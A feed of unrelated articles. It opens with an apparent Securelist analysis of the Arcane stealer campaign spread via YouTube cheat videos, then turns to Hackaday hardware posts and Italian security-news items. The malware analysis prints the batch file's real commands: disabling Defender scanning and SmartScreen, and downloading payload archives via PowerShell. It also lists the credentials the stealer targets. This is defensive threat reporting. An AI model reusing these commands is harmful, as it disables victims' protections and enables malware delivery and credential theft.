At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.

Distribution

The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.

Archive root

Contents of the “natives” subfolder

The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell, and unpack that with UnRAR.exe with the password embedded in the BATCH file as an argument.

Contents of the obfuscated start.bat file

Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/<redacted>\')"
powershell -Command "(New-Object Net.WebClient).DownloadFile(\'https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1\', \'C:\\Users\\<redacted>\\AppData\\Local\\Temp\\black.rar\')"

Key commands run by start.bat

The archive would always contain two executables: a miner and a stealer.

Contents of the downloaded archive

The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo, which, when generating stealer activity reports, is written to the beginning of the file along with the date and time of the report’s creation.

Phemedrone and VGS logos

Original distribution scheme

Arcane replaces VGS

At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.

Arcane logo

Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.

Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:

• VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
• Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
• Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
• Email clients: Outlook
• Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
• Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi

In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.

Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.

The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.

• gmail.com,
• drive.google.com,
• photos.google.com,
• mail.ru,
• rambler.ru,
• steamcommunity.com,
• youtube.com,
• avito.ru,
• ozon.ru,
• twitter.com,
• roblox.com,
• passport.yandex.ru

ArcanaLoader

Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.

ArcanaLoader

See translation

The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.

Discord server invitation

See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation

At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.

Looking for bloggers to spread the loader

See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role

Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.

Victims

All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.

Takeaways

Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.

securelist.com/arcane-stealer/…

Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.
Resin2FDM separates the model from the support structure, then converts the support structure to be FDM-friendly.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.

Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.

For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.

To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.

Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.

youtube.com/embed/zZp-CLhH1Ao?…

hackaday.com/2025/03/19/make-f…

Un nuovo pericoloso Remote Access Trojan (RAT) altamente sofisticato, denominato StilachiRAT, sta circolando con l’obiettivo di sottrarre credenziali, dati sensibili e criptovalute. Questo malware utilizza tecniche avanzate di evasione per rimanere inosservato, garantire la persistenza e permettere ai cybercriminali di operare indisturbati.

Un RAT su misura per lo spionaggio e il furto

Scoperto a novembre 2024 dai ricercatori di Microsoft Incident Response, StilachiRAT si distingue per la sua capacità di infiltrarsi nei sistemi target senza destare sospetti.

Tra le sue principali funzioni troviamo:

• Furto di credenziali: estrae informazioni sensibili salvate nei browser, inclusi i dati delle criptovalute.
• Monitoraggio dell’attività utente: raccoglie dati di sistema, rileva la presenza di telecamere, analizza sessioni RDP attive e le applicazioni in esecuzione.
• Attacco alle criptovalute: scansiona la configurazione di oltre 20 wallet digitali, tra cui Coinbase Wallet, Metamask e Trust Wallet.
• Persistenza e movimento laterale: sfrutta Windows Service Control Manager per rimanere attivo e persiste anche dopo tentativi di rimozione.

Attacco silenzioso e pericoloso

StilachiRAT non si limita a raccogliere informazioni, ma implementa anche funzionalità avanzate per evitare il rilevamento:

• Cancellazione dei log di sistema: elimina tracce dell’attacco per impedire indagini forensi.
• Evasione da sandbox: utilizza chiamate API offuscate per rendere l’analisi più complessa.
• Manipolazione delle finestre di sistema: monitora l’attività dell’utente per carpire password e dati sensibili direttamente dallo schermo.

Una volta insediato, StilachiRAT permette ai criminali di controllare il dispositivo infetto tramite comandi da un server C2. Questi comandi includono:

• Esecuzione di applicazioni malevole;
• Riavvio o sospensione del sistema;
• Modifica di chiavi di registro di Windows;
• Creazione di proxy per camuffare il traffico malevolo.

Difendersi è possibile

Sebbene Microsoft non abbia ancora attribuito StilachiRAT a un gruppo specifico, la sua pericolosità è evidente. Per ridurre il rischio di infezione, è essenziale adottare alcune contromisure:

• Scaricare software esclusivamente da fonti ufficiali;
• Utilizzare soluzioni di sicurezza avanzate che blocchino domini e allegati sospetti;
• Monitorare le sessioni RDP e implementare autenticazione a più fattori;
• Effettuare controlli di sicurezza regolari per individuare attività anomale.

Conclusione

Il panorama delle minacce informatiche non mostra segni di rallentamento e StilachiRAT ne è l’ennesima dimostrazione. Questo malware rappresenta un rischio concreto per aziende e utenti, con il suo focus su credenziali, criptovalute e accessi remoti. La difesa efficace passa attraverso la consapevolezza e l’adozione di misure di sicurezza mirate. L’informazione e la prevenzione sono le armi più potenti contro queste minacce in continua evoluzione.

L'articolo StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia! proviene da il blog della sicurezza informatica.

Il team di threat hunting di Trend Zero Day Initiative™ (ZDI) ha identificato casi significativi di sfruttamento di un bug di sicurezza in una serie di campagne risalenti al 2017. L’analisi ha rivelato che 11 gruppi sponsorizzati da stati provenienti da Corea del Nord, Iran, Russia e Cina hanno impiegato il bug monitorato con il codice ZDI-CAN-25373 in operazioni motivate principalmente da cyber spionaggio e furto di dati.

Trendmicro ha scoperto quasi mille campioni Shell Link (.lnk) che sfruttano ZDI-CAN-25373; tuttavia, è probabile che il numero totale di tentativi di sfruttamento sia molto più alto. Successivamente, i ricercatori hanno inviato un exploit proof-of-concept tramite il programma bug bounty di Trend ZDI a Microsoft, che ha rifiutato di risolvere questa vulnerabilità con una patch di sicurezza.
Numero di campioni da gruppi APT che sfruttano ZDI-CAN-25373 (fonte TrendMicro)
La vulnerabilità, identificata come ZDI-CAN-25373, consente agli aggressori di eseguire comandi dannosi nascosti sui computer delle vittime sfruttando file di collegamento di Windows (.lnk) appositamente creati. Questa falla di sicurezza influisce sul modo in cui Windows visualizza il contenuto dei file di collegamento tramite la sua interfaccia utente. Quando gli utenti esaminano un file .lnk compromesso, Windows non riesce a visualizzare i comandi dannosi nascosti al suo interno, nascondendo di fatto il vero pericolo del file.

Ad oggi sono stati scoperti quasi 1.000 artefatti del file .LNK che sfruttano ZDI-CAN-25373, la maggior parte dei quali è collegata a Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) e ScarCruft (Earth Manticore).

Degli 11 attori di minacce sponsorizzati dallo stato che sono stati scoperti ad abusare della falla, quasi la metà di loro proviene dalla Corea del Nord. Oltre a sfruttare la falla in vari momenti, la scoperta serve come indicazione di collaborazione incrociata tra i diversi cluster di minacce che operano all’interno dell’apparato informatico di Pyongyang.
Paesi di origine APT che hanno sfruttato ZDI-CAN-25373 (fonte TrendMicro)
Nello specifico, il bug comporta l’aggiunta degli argomenti con i caratteri di spazio (0x20), tabulazione orizzontale (0x09), avanzamento riga (0x0A), tabulazione verticale (\x0B), avanzamento pagina (\x0C) e ritorno a capo (0x0D) per eludere il rilevamento.

I dati di telemetria indicano che governi, enti privati, organizzazioni finanziarie, think tank, fornitori di servizi di telecomunicazione e agenzie militari/difesa situate negli Stati Uniti, in Canada, Russia, Corea del Sud, Vietnam e Brasile sono diventati i principali obiettivi degli attacchi che sfruttano questa vulnerabilità.

Negli attacchi analizzati da ZDI, i file .LNK fungono da veicolo di distribuzione per famiglie di malware note come Lumma Stealer, GuLoader e Remcos RAT, tra gli altri. Tra queste campagne, degna di nota è lo sfruttamento di ZDI-CAN-25373 da parte di Evil Corp.

Vale la pena notare che .LNK è tra le estensioni di file pericolose bloccate nei prodotti microsoft come Outlook, Word, Excel, PowerPoint e OneNote. Di conseguenza, il tentativo di aprire tali file scaricati dal Web avvia automaticamente un avviso di sicurezza che consiglia agli utenti di non aprire file da fonti sconosciute.

L'articolo 8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT proviene da il blog della sicurezza informatica.

Il panorama delle minacce ransomware è in costante evoluzione, con gruppi sempre più strutturati che adottano strategie sofisticate per massimizzare il profitto. VanHelsing è un nuovo attore che si sta posizionando nel mercato del Ransomware-as-a-Service (RaaS), un modello che consente anche a cybercriminali con competenze limitate di condurre attacchi avanzati grazie a una piattaforma automatizzata.

Dopo l’annuncio del 23 febbraio 2025 sul forum underground riguardante il programma di affiliazione VanHelsing RaaS, il gruppo ransomware ha ufficialmente pubblicato la prima possbile vittima sul proprio Data Leak Site (DLS).

A meno di un mese dal lancio, la comparsa della prima organizzazione colpita conferma che il gruppo ha iniziato ad operare attivamente. Sebbene il DLS sia ancora scarno, il debutto di una vittima suggerisce che gli affiliati stiano già distribuendo il ransomware e che il numero di attacchi potrebbe aumentare rapidamente.

VanHelsing RaaS: Un Programma Strutturato per gli Affiliati

L’annuncio del 23 febbraio ha rivelato dettagli significativi sul funzionamento del programma VanHelsing RaaS, che si distingue per una strategia di reclutamento selettivo e strumenti avanzati.

Punti chiave del programma di affiliazione:

• Ingresso su invito: gli affiliati con una reputazione consolidata nel cybercrime possono aderire gratuitamente.
• Quota di ingresso per nuovi affiliati: chi non ha una reputazione pregressa deve pagare $5.000 per accedere alla piattaforma.
• Strumenti avanzati: accesso a un pannello web, un sistema di chat privato, un locker per chiavi di cifratura, strumenti di esfiltrazione dati e funzionalità di attacco ransomware automatizzate.
• Revenue sharing: gli affiliati trattengono l’80% del riscatto, mentre VanHelsing trattiene il 20%.
• Escrow su blockchain: i fondi vengono rilasciati dopo due conferme, riducendo i rischi di frode tra affiliati e sviluppatori.
• Crittografia avanzata: utilizzo di protocolli di cifratura di alto livello per rendere il ransomware resiliente alle contromisure.
• Automazione completa: il ransomware è interamente gestito tramite il pannello di controllo, eliminando errori operativi e riducendo la necessità di intervento manuale.

La Prima Possibile Vittima Pubblicata sul DLS

La prima possibile organizzazione colpita da VanHelsing RaaS opera nel settore pubblico, con funzioni amministrative Questo suggerisce che il gruppo potrebbe prendere di mira enti governativi, municipalità o servizi pubblici, categorie spesso vulnerabili a ransomware.

L’attacco sembra seguire una strategia di doppia estorsione, con un countdown di 10 giorni prima della pubblicazione dei dati esfiltrati. Questo lascia intendere che il gruppo stia negoziando un riscatto con l’ente colpito, cercando di massimizzare il profitto prima di rendere pubbliche eventuali informazioni sensibili.

Anatomia del DLS

Al momento, il DLS di VanHelsing contiene una sola possibile vittima, il che potrebbe indicare diverse possibilità:

1. Il gruppo sta testando l’infrastruttura prima di pubblicare attacchi su larga scala.
2. Ci sono altre vittime in fase di negoziazione, che non sono ancora state elencate nel DLS.
3. Gli affiliati stanno ancora adottando il ransomware, e il numero di attacchi potrebbe aumentare esponenzialmente nelle prossime settimane.

L’esperienza con altri gruppi RaaS dimostra che il numero di vittime può crescere rapidamente man mano che nuovi cybercriminali iniziano ad utilizzare il servizio.

VanHelsing Chat: La Piattaforma di Comunicazione Privata

Un altro elemento distintivo di VanHelsing è la presenza di un portale di chat privato, accessibile solo tramite un Session ID. Questa piattaforma suggerisce che il gruppo gestisce direttamente le negoziazioni con le vittime e le comunicazioni con gli affiliati, senza affidarsi a strumenti pubblici come Telegram o forum underground.

L’adozione di una chat privata offre diversi vantaggi operativi:

• Maggiore sicurezza → Riduce il rischio di infiltrazioni da parte delle forze dell’ordine o di ricercatori di cybersecurity.
• Gestione diretta delle richieste di riscatto → Le vittime possono comunicare direttamente con il team di VanHelsing o con l’affiliato responsabile dell’attacco.
• Coordinamento degli affiliati → I membri del programma RaaS possono ricevere supporto tecnico e aggiornamenti operativi in tempo reale.

Questa infrastruttura è indicativa di un gruppo ransomware che punta a una gestione centralizzata e professionale degli attacchi, un elemento distintivo rispetto a operatori meno organizzati.

Conclusioni

L’emergere di VanHelsing RaaS rappresenta un’ulteriore evoluzione del modello ransomware, con un’infrastruttura altamente scalabile e strumenti avanzati per affiliati. La loro attenzione all’automazione e alla sicurezza operativa suggerisce che potremmo assistere a un aumento degli attacchi nei prossimi mesi, con impatti significativi su aziende e infrastrutture critiche.

L'articolo VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione proviene da il blog della sicurezza informatica.

Laser microphones have been around since the Cold War. Back in those days, they were a favorite tool of the KGB – allowing spies to listen in on what was being said in a room from a safe distance. This project by [SomethingAbtScience] resurrects that concept with a DIY build that any hacker worth their soldering iron can whip up on a modest budget. And let’s face it, few things are cooler than turning a distant window into a microphone.

At its core this hack shines a laser on a window, detects the reflected light, and picks up subtle vibrations caused by conversations inside the room. [SomethingAbtScience] uses an ordinary red laser (visible, because YouTube rules) and repurposes an amplifier circuit ripped from an old mic, swapping the capsule for a photodiode. The build is elegant in its simplicity, but what really makes it shine is the attention to detail: adding a polarizing filter to cut ambient noise and 3D printing a stabilized sensor mount. The output is still a bit noisy, but with some fine tuning – and perhaps a second sensor for differential analysis – there’s potential for crystal-clear audio reconstruction. Just don’t expect it to pass MI6 quality control.

While you probably won’t be spying on diplomats anytime soon, this project is a fascinating glimpse into a bygone era of physical surveillance. It’s also a reminder of how much can be accomplished with a laser pointer, some ingenuity, and the curiosity to see how far a signal can travel.

youtube.com/embed/EiVi8AjG4OY?…

hackaday.com/2025/03/18/spy-te…

Here’s the thing about coding. When you’re working on embedded projects, it’s quite easy to run into hardware limitations, and quite suddenly, too. You find yourself desperately trying to find a way to speed things up, only… there are no clock cycles to spare. It’s at this point that you might reach for the magic of direct memory access (DMA). [Larry] is here to advocate for its use.

DMA isn’t just for the embedded world; it was once a big deal on computers, too. It’s just rarer these days due to security concerns and all that. Whichever platform you’re on, though, it’s a valuable tool to have in your arsenal. As [Larry] explains, DMA is a great way to move data from memory location to memory location, or from memory to peripherals and back, without involving the CPU. Basically, a special subsystem handles trucking data from A to B while the CPU gets on with whatever other calculations it had to do. It’s often a little more complicated in practice, but that’s what [Larry] takes pleasure in explaining.

Indeed, back before I was a Hackaday writer, I was no stranger to DMA techniques myself—and I got my project published here! I put it to good use in speeding up an LCD library for the Arduino Due. It was the perfect application for DMA—my main code could handle updating the graphics buffer as needed, while the DMA subsystem handled trucking the buffer out to the LCD quicksmart.

If you’re struggling with updating a screen or LED strings, or you need to do something fancy with sound, DMA might just be the ticket. Meanwhile, if you’ve got your own speedy DMA tricks up your sleeve, don’t hesitate to let us know!

hackaday.com/2025/03/18/speedi…

Electricity can be a pretty handy tool when it stays within the bounds of its wiring. It’s largely responsible for our modern world and its applications are endless. When it’s not running in wires or electronics though, things can get much more complicated even for things that seem simple on the surface. For example, measuring moisture in soil seems straightforward, but corrosion presents immediate problems. To combat the problems with measuring things in the natural world with electricity, [David] built this capacitive soil moisture sensor which also has the benefit of using an extremely small amount of energy to operate.

The sensor is based on an STM32 microcontroller, in this case one specifically optimized for low-power applications. The other low-power key to this build is the small seven-segment e-ink display. The segments are oriented as horizontal lines, making this a great indicator for measuring a varying gradient of any type. The microcontroller only wakes up every 15 minutes, takes a measurement, and then updates the display before going back to sleep.

To solve the problem resistive moisture sensors have where they’re directly in contact with damp conditions and rapidly corrode, [David] is using a capacitive sensor instead which measures a changing capacitance as moisture changes. This allows the contacts to be much more isolated from the environment. The sensor has been up and running for a few months now with the coin cell driving the system still going strong and the house plants still alive and properly watered. Of course if you’re looking to take your houseplant game to the next level you could always build a hydroponics system which automates not only the watering of plants but everything else as well.

hackaday.com/2025/03/18/ultra-…

It’s 2025, and you’re still probably pressing modifier keys on your keyboard like a… regular person. But it doesn’t have to be this way! You could use foot pedals instead, as [Jan Herman] demonstrates.

Now, if you’re a diehard embedded engineer, you might be contemplating your favorite USB HID interface chip and how best to whip up a custom PCB for the job. But it doesn’t have to be that complicated! Instead, [Jan] goes for an old school hack—he simply ripped the guts out of an cheap USB keyboard. From there, he wired up a few of the matrix pads to 3.5 mm jack connectors, and put the whole lot in a little metal project box. Then, he hooked up a few foot pedal switches with 3.5 mm plugs to complete the project.

[Jan] has it set up so he can plug foot pedals in to whichever keys he needs at a given moment. For example, he can plug a foot pedal in to act as SPACE, ESC, CTRL, ENTER, SHIFT, ALT, or left or right arrow. It’s a neat way to make the project quickly reconfigurable for different productivity tasks. Plus, you can see what each pedal does at a glance, just based on how it’s plugged in.

It’s not an advanced hack, but it’s a satisfying one. We’ve seen some other great builds in this space before, too. If you’re cooking up your own keyboard productivity hacks, don’t hesitate to let us know!

hackaday.com/2025/03/18/a-foot…

Somewhere between the period of 1999 and 2007 a plague swept through the world, devastating lives and businesses. Identified by a scourge of electrolytic capacitors violently exploding or splurging their liquid electrolyte guts all over the PCB, it led to a lot of finger pointing and accusations of stolen electrolyte formulas. In a recent video by [Asianometry] this story is summarized.
Blown electrolytic capacitors. (Credit: Jens Both, Wikimedia)
The bad electrolyte in the faulty capacitors lacked a suitable depolarizer, which resulted in more gas being produced, ultimately leading to build-up of pressure and the capacitor ultimately failing in a way that could be rather benign if the scored top worked as vent, or violently if not.

Other critical elements in the electrolyte are passivators, to protect the aluminium against the electrolyte’s effects. Although often blamed on a single employee stealing an (incomplete) Rubycon electrolyte formula, the video questions this narrative, as the problem was too widespread.

More likely it coincided with the introduction of low-ESR electrolytic capacitors, along with computers becoming increasingly more power-hungry, and thus stressing the capacitors in a much warmer environment than in the early 1990s. Combine this with the presence of counterfeit capacitors in the market and the truth of what happened to cause the Capacitor Plague probably involves a bit from each column, a narrative that seems to be the general consensus.

youtube.com/embed/rSpzAVpnXo4?…

hackaday.com/2025/03/18/the-ca…

Let’s just kick things off in style with the fabulously brutalist Bayleaf wireless split from [StunningBreadfruit30], shall we? Be sure to check out the wonderful build log/information site as well for the full details.

Image by [StunningBreadfruit30] via redditHere’s the gist: this sexy split grid of beautiful multi-jet fusion (MJF) keycaps sits on top of Kailh PG1316S switches. The CNC-machined aluminium enclosure hides nice!nano boards with a sweet little dip in each one that really pull the keyboard together.

For the first serious custom build, [StunningBreadfruit30] wanted a polished look and finish, and to that I say wow, yes; good job, and nod enthusiastically as I’m sure you are. Believe it or not, [StunningBreadfruit30] came into this with no CAD skills at all. But it was an amazing learning experience overall, and an even better version is in the works.

I didn’t read the things. Is it open-source? It’s not, at least not at this time. But before you get too-too excited, remember that it cost $400 to build, and that doesn’t even count shipping or the tools that this project necessitated purchasing. However, [StunningBreadfruit30] says that it may be for sale in the future, although the design will have an improved sound profile and ergonomics. There’s actually a laundry list of ideas for the next iteration.

Apiaster Aims to Be the Beginner’s Endgame

That’s right — [Saixos]’ adjustable 50-key Apiaster is designed to be endgame right from the start, whether you’re just getting into the ergo side of the hobby, or are already deep in and are just now finding out about this keyboard. Sorry about that!

Image by [Saixos] via redditSo, it’s adjustable? Yes, in more ways than one. It can utilize either a single RP2040 Zero, or else one or multiple XIAO BLEs. The thumb cluster snaps off and can be moved wherever you like.

And [Saixos] didn’t stop there. In the magnificent repo, there’s a Python-generated case that’s highly customizable, plus MX and Choc versions of the PCB. Finally, Apiaster can use either LiPo batteries or a coin cell.

The other main crux of the biscuit here is price, and the Apiaster can be built for about $37 total minus shipping/customs/tariffs and/or tooling. That’s pretty darn good, especially if this really becomes your endgame.

The Centerfold: A ’90s Kid Works Here

Image by [nismology5] via redditAfter using a Durgod Taurus K320 rectangle for a number of years, [nismology5] decided to lean into ergo and acquired a Keychron Q8 with a knob and the Alice layout after falling in love with the look of GMK Panels keycaps and the Alice herself.

Perhaps the biggest change is going from clacky blues on the Taurus to silent and slinky reds. Who knows why such a drastic change, but [nismology5] is digging the smoothness and quietude underneath those GMK Panels clones from Ali.

Now, let’s talk about that sweet trackball. It’s a Clearly Superior Technologies (CST) KidTRAC with a pool ball swapped in. They are discontinued, sadly, but at least one was available as NOS on eBay. Not to worry — they are being produced by another company out of the UK and come in that sweet UNO Draw 4 Wild drip.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Fox was Quite Fetching

The lovely Fox was named not for its primary inventor Glenn J. Barrett, but instead for company president William R. Fox. Although this may seem unfair, the Fox is a pretty great name for a good-looking typewriter.
Image via The Classic Typewriter Page
This nineteenth-century Fox appeared in 1898, shortly after it was patented and had a number of nice features, like a notably light touch. The carriage can be removed easily for cleaning and maintenance. And the machine had a “speed escapement”, which affects the carriage advancement timing. It could be set to advance either when a typebar returns to rest, or as soon as the typebar starts off for the platen.

The first Foxes were understroke machines, which is another term for blind writer, meaning that one must lift something out of the way to see what one had written as the typebars strike the platen from underneath. In the case of the Fox, one need only turn the platen slightly.

Frontstroke or ‘visible’ typewriters were coming into vogue already, so the company introduced a frontstroke machine in 1906. It had many of the same features as the blind-writing Foxen, such as the dual-speed escapement. A one- or two-color ribbon could be used, and the machine could be set to oscillate the ribbon so as not to waste the entire bottom half as most typewriters did. I’d like to see it set to oscillate with a two-color ribbon, that’s for sure!

To capitalize on the portable craze, they built the so-called “Baby Fox” in 1917. Corona found the resemblance to their own portables quite striking and successfully sued Fox. The company went out of business in 1921, possibly because of this litigation. Ah, well.

Finally, a Keyboard for Mice

Image by [RobertLobLaw2] via redditMuch like the fuzzy-bezeled cat keyboard from a few Keebins ago, [RobertLobLaw2]’s keyboard isn’t quite as cheesy as may first appear. For one thing, most of the legends are in this Swiss cheese-inspired font that’s a little bit hard to read, so you’d better have your QWERTY straight.

Probably the best thing about these delicious-looking 3D-printed keycaps are the cheese knife Backspace, Enter, and right Shift along with the novelties like the mousy Esc. Underneath all that fromage is a Keychron V6 Max with unknown switches.

[RobertLobLaw2] explains that cheese and keyboards have more in common than you think, as both hobbies use ‘pretentious adjectives to describe the sensory experience (of the hobby)’. Boy, if that isn’t the thocking truth. Should you require such a charcuter-key board for yourself, the files are freely available.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/03/18/keebin…

There’s something that kills coding speed—iteration time. If you can smash a function key and run your code, then watch it break, tweak, and smash it again—you’re working fast. But if you have to first compile your code, then plug your hardware in, burn it to the board, and so on… you’re wasting a lot of time. It’s that problem that inspired [Larry] to create an embedded system simulator to speed development time for simple projects.

The simulator is intended for emulating Arduino builds on iPhone and Mac hardware. For example, [Larry] shows off a demo on an old iPhone, which is simulating an ESP32 playing a GIF on a small LCD display. The build isn’t intended for timing-delicate stuff, nor anything involving advanced low-level peripherals or sleep routines and the like. For that, you’re better off with real hardware. But if you’re working on something like a user interface for a small embedded display, or just making minor tweaks to some code… you can understand why the the simulator might be a much faster way to work.

For now, [Larry] has kept the project closed source, as he’s found that it wouldn’t reasonably be possible for him to customize it for everyone’s unique hardware and use cases. Still, it’s a great example of how creating your own tools can ease your life as a developer. We’ve seen [Larry]’s great work around here before, like this speedy JPEG decoder library.

youtube.com/embed/j1ryXNiYefc?…

hackaday.com/2025/03/18/simula…

An Instruction Set Architecture (ISA) defines the software interface through which for example a central processor unit (CPU) is controlled. Unlike early computer systems which didn’t define a standard ISA as such, over time the compatibility and portability benefits of having a standard ISA became obvious. But of course the best part about standards is that there are so many of them, and thus every CPU manufacturer came up with their own.

Throughout the 1980s and 1990s, the number of mainstream ISAs dropped sharply as the computer industry coalesced around a few major ones in each type of application. Intel’s x86 won out on desktop and smaller servers while ARM proclaimed victory in low-power and portable devices, and for Big Iron you always had IBM’s Power ISA. Since we last covered the ISA Wars in 2019, quite a lot of things have changed, including Apple shifting its desktop systems to ARM from x86 with Apple Silicon and finally MIPS experiencing an afterlife in the form of LoongArch.

Meanwhile, six years after the aforementioned ISA Wars article in which newcomer RISC-V was covered, this ISA seems to have not made the splash some had expected. This raises questions about what we can expect from RISC-V and other ISAs in the future, as well as how relevant having different ISAs is when it comes to aspects like CPU performance and their microarchitecture.

RISC Everywhere

Unlike in the past when CPU microarchitectures were still rather in flux, these days they all seem to coalesce around a similar set of features, including out-of-order execution, prefetching, superscalar parallelism, speculative execution, branch prediction and multi-core designs. Most of the performance these days is gained from addressing specific bottlenecks and optimization for specific usage scenarios, which has resulted in such things like simultaneous multithreading (SMT) and various pipelining and instruction decoder designs.

